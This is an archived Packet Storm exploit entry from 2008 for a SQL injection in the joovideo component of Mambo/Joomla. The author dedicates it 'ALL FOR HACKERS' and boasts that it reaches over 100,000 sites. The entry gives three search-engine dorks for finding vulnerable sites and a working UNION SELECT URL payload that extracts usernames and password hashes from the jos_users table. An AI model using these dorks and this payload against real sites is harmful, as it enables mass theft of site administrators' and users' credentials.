joomlajoovideo-sql.txt

2008-03-19T00:00:00
ID PACKETSTORM:64716
Type packetstorm
Reporter S@BUN
Modified 2008-03-19T00:00:00

Description

                                        
                                            `##########################################  
#  
# Mambo Component com_joovideo SQL Injection(Powered by joovideo V1.0)  
#  
##########################################  
#  
##AUTHOR : S@BUN  
#  
####HOME : http://www.milw0rm.com/author/1334  
#  
####MAİL : hackturkiye.hackturkiye@gmail.com  
#  
###########################################  
TODAY MY BİRTDAY  
SOO I WROTE 5 BUGS ALL FOR HACKERS  
5 EXPLOİTS HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE  
DONT FORGET MY PRESENT HACKERS  
GOOD LUCKY  
  
100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi  
YASGUNUM NEDENiYLE HEDiYE  
iYi SANLAR  
  
you can see all my exploits  
  
http://my.opera.com/SQL-Injection/blog/  
  
###########################################  
#  
# DORK 1 : allinurl: "com_joovideo" detail  
#  
# DORK 2 : allinurl: "com_joovideo"  
#  
# DORK 3 : Powered by joovideo V1.0  
#  
###########################################  
EXPLOIT :  
  
index.php?option=com_joovideo&Itemid=S@BUN&task=detail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*  
  
###########################################  
##################S@BUN####################  
###########################################  
#####hackturkiye.hackturkiye@gmail.com#####  
###########################################  
  
side note:  
<name>joovideo</name>  
<creationDate>18.04.2007</creationDate>  
<author>joomlapixel</author>  
<copyright>This component in released under the commercial License</copyright>  
<authorEmail>info@joomlapixel.eu</authorEmail>  
  
<authorUrl>www.joomlapixel.eu</authorUrl>  
<version>1.2.2</version>  
<description>joovideo! video manager semplificato per joomla!, versione commerciale</description>  
  
`